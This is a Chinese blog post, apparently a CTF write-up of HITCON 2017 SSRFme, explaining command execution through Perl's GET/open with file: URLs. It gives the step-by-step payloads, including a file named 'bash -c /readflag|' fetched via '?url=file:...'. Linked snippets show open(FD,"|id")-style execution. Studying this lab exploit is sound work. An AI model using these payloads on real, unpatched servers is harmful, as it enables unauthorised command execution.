perl脚本GET系统命令执行

于 2021-10-22 23:46:51 发布
阅读量914 收藏
点赞数
分类专栏: Web安全学习篇 文章标签: perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120914557
版权
这篇博客介绍了Perl脚本中GET请求执行系统命令的原理,探讨了Ubuntu 18.04修复的安全漏洞,并展示了如何利用file协议和管道符号进行SSRF攻击。通过创建特定文件并利用GET请求执行bash命令,最终达到读取目标文件的目的。修复措施和漏洞利用细节被详细记录下来。
摘要由CSDN通过智能技术生成

题目来自 [HITCON 2017]SSRFme

在这里插入图片描述

代码的思路很简单,就是会先建一个文件夹sandbox/md5(orange+ip),然后将url的值写到filename文件中

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
这行代码开始以为就是GET请求,所以想到了file协议去读文件,但这种做法是错误的

简单记录一下perl脚本GET系统命令执行的学习
在这里插入图片描述
简单来看看使用GET如何来执行系统命令。具体为啥原因我也说不上来,大概就是open函数支持file协议

perl里的GET函数底层就是调用了open处理

要执行的命令首先必须要有该文件存在,以命令为文件名的文件存在

ubuntu18.04 已经修复此漏洞
修复的方式是在下面第三行代码中,open中间加了个参数’<’

    if ($method ne "HEAD") {
	open(my $fh,'<', $path) or return new         ##就是这里出了问题
	    HTTP::Response(HTTP::Status::RC_INTERNAL_SERVER_ERROR,
			   "Cannot read file '$path': $!");
	binmode($fh);
	$response =  $self->collect($arg, $response, sub {
	    my $content = "";
	    my $bytes = sysread($fh, $content, $size);
	    return \$content if $bytes > 0;
	    return \ "";
	});
	close($fh);
    }
    $response;
}

暂且删掉这个 <不管他

利用file:bash -c "cmd string"来读文件

?url=/&filename=aaa
在这里插入图片描述
之前提到要 open函数 执行命令首先就是必须存在这个文件,那么我们首先就是要创建一个以命令命名的文件,然后再去执行

创建 bash -c /readflag| 命名的文件

?url=&filename=bash -c /readflag|

利用GET执行 bash -c /readflag| 并且写到 文件aaa中

?url=file:bash -c /readflag|&filename=aaa

最后访问 sandbox/md5(orange+ip)/aaa 就可以了

然后就是 | ,这个应该是个分界符的意思,因为他放在前面也是可以的,比如| /readflag

也不是很清楚,就简单记录一下,详细的可以看看这个大佬写的

-------------------perl脚本GET执行系统命令---------------------

paidx0
关注
专栏目录
perl get请求发送json数据
zhaoyangjian724的专栏
11-30 365
use LWP::UserAgent; use LWP; use Encode; use LWP::Simple; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; use HTTP::Response; use Encode; use URI::Escape; use URI::URL; use JSON; use Data:...
perl执行系统命令
yingying.liu的专栏
05-10 4442
Perl中,可以用system、exec、readpipe这三个命令来调用其他脚本系统命令等。这三个命令的主要区别就是返回值。 1) 对于system这个函数来说,它会返回执行后的状态,比如说     my @args = (“command”, “arg1″, “arg2″);     system(@args) == 0     or die “system @args faile
perl中调用系统命令
cuandui4473的博客
05-25 500
perl可以调用操作系统的命令,使用反引号,qx都是可以的, 但是如果调用的命令中要注意特殊字符的转换,比如$,假如我想调用 date|awk '{print $1}'如果正常写入 qx(date|awk '...
[HITCON 2017]SSRFme(Perl中GET命令执行
qq_44657899的博客
07-31 2600
223.87.241.22 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox
RCE绕过之GET命令执行
Ciyaso的博客
07-23 595
Perl中open命令执行(GET) ①使用GET读取文件 如果GET后面跟路径的话,可以直接获取文件或目录内容 GET /root/1010/1 GET /root/1010/1/flag.php 读取根目录 GET / ②使用GET执行命令 GET底层实现使用的是open函数,而open函数可以执行命令,所以我们可以用GET来执行命令 Perl在线工具 open(FD,"|ls"); print<FD>; 当GET使用file协议的时候就会调用到perl的open函数 ls GE
在Java中运行Perl脚本 JERL
06-02
反之,Perl脚本可以通过`Jerl::getVariable("varName")`获取Java的变量值。 **异常处理** 由于Perl脚本可能会抛出异常,因此在Java中调用Perl代码时,需要捕获并处理`jerl.JerlException`。此外,需要注意Perl脚本...
在Java中运行Perl脚本 JERL.7z
07-06
在Java环境中运行Perl脚本可能对开发者来说是一个挑战,因为Java和Perl是两种不同的编程语言,它们有自己的执行环境。然而,有一些工具和库可以帮助我们实现这个目标。JERL(Java-Embedded Ruby and Perl Library)...
基于java的在Java中运行Perl脚本 JERL.zip
最新发布
05-28
5. 错误处理:如果Perl脚本执行过程中发生错误,`Perl`对象的`getError()`方法可以获取错误信息。 6. 释放资源:在不再需要Perl环境时,记得调用`Perl`对象的`dispose()`方法,以释放内存并关闭连接。 在实际应用...
perl脚本大全
11-04
Perl脚本大全通常包含各种示例代码、教程和实用脚本,帮助学习者掌握Perl语言的核心概念和高级特性。 在Perl中,语法简洁而富有表现力,它吸收了C、sed、awk等语言的特性。例如,Perl的变量声明以符号`$`(对于标量...
Perl脚本实例
01-12
在这个“Perl脚本实例”中,我们可以深入学习和理解Perl的基本语法和常用技巧。 首先,让我们探讨Perl的基本语法。Perl中的每条语句都以分号结尾,例如: ```perl print "Hello, World!\n"; ``` 这里,“print”是...
perl几种调用操作系统命令或者脚本的方式及优缺点
wgz7747147820的博客
10-30 799
exec(@COMMANDS); 优点: 在当前进程直接运行外部命令或者脚本,对外部命令或者脚本返回状态捕获较好! 缺点: 如果出错直接退出perl脚本,无法捕获@COMMANDS的输出。 system(@COMMANDS) or die (ERROR:$?); 优点: fork子进程执行外部命令或者脚本,外部命令或者脚本出错,不会影响当前进程,对外部命令或者脚本的返回状态捕获较好。 缺点:无法捕获@commands输出。 @return=COMMANDS; 优点: 能捕获脚本的STDOUT输出..
Perl脚本执行方法小结
weixin_34268310的博客
12-04 5209
Perl脚本执行: ./filename.pl 要这样用,脚本需添加声明行,Linux下一般是添加:#!/usr/bin/perl -w perl filename.pl Perl 脚本普遍适用,包括在Windows CMD下执行 perl -w file...
perl脚本中GET命令执行漏洞([HITCON 2017]SSRFme)
qq_45521281的博客
04-30 2982
GET命令执行漏洞 思路来自于HITCON2017中的ssrfme,考点是GET的任意命令执行。代码很简单,调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。 我不知道关于这个问题最早是什么时候爆出的了,但确实已经很多年了。 root@iZ285ei82c1Z:~/test# cat a.pl open(FD, "|id"); print <FD...
Perl用LWP实现GET/POST数据发送 原
kongjunlongaa的博客
12-05 787
1. GET ,获取网页内容,3句话,很简单吧! #!perl -w use strict; use LWP; my $browser = LWP::UserAgent->new(); my $response= $browser->get("http://www.toolmao.com"); print $response->content; # 输出获得的网页内容
perl脚本执行linux命令行,Perl调用shell命令方法小结
weixin_39873177的博客
05-01 2122
一、systemperl也可以用system调用shell的命令,它和awk的system一样,返回值也是它调用的命令的退出状态.代码如下:[root@AX3sp2 ~]# cat aa.pl#! /usr/bin/perl -w$file = "wt.pl";system("ls -l wt.pl");$result = system "ls -l $file";print "$result \...
perl函数说明(getgrent)
紫轩阁
07-08 531
getgrent setgrent endgrent 这些过程遍历你的 /etc/group 文件(或者是别人的 /etc/group 文件,如果这个文件来自一台服务器什么的地方的话)。在列表环境里,getgrent 的返回值是: ($name, $passwd, $gid, $members) 这里 $members 包含一个空格分隔的列表,该列表就是该组成员的登录名字。要设
perl get请求加请求头
zhaoyangjian724的专栏
11-30 611
use LWP::UserAgent; use LWP; use Encode; use LWP::Simple; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; use HTTP::Response; use Encode; use URI::Escape; use URI::URL; use JSON; use Data:
perl 运行linux命令,Perl执行shell命令的几种方式及其区别
weixin_32520601的博客
04-28 295
system() executes the command specified. It doesn't capture theoutput of the command.system() accepts as argument either a scalar or an array. If theargument is a scalar, system() uses a shell to exec...
perl函数说明(getnetent)
紫轩阁
07-10 519
getnetent setnetent STAYOPEN endnetent 这个函数遍历你的 /etc/networks 文件。其返回值在列表环境中是: ($name, $aliases, $addrtype, $net) = getnetent(); 在标量环境里,getnetent 只返回网络名字。Net::netent 模块支持一个通过名字访问这个函数的接口。参阅 get
Perl脚本:HTTP数据包处理实战与libpcap应用
1. Perl脚本执行:在命令行环境中,首先需要确保脚本位于可执行目录,然后通过`perl 文件名.pl`命令运行Perl脚本,用于后续的HTTP数据包操作。 2. Libpcap基础:libpcap是一种开源库,用于在Unix/Linux系统上抓取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值